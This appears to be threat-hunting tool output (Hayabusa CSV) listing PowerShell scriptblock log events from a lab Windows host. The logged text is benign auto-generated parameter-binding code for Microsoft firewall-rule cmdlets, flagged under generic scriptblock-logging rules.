[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} 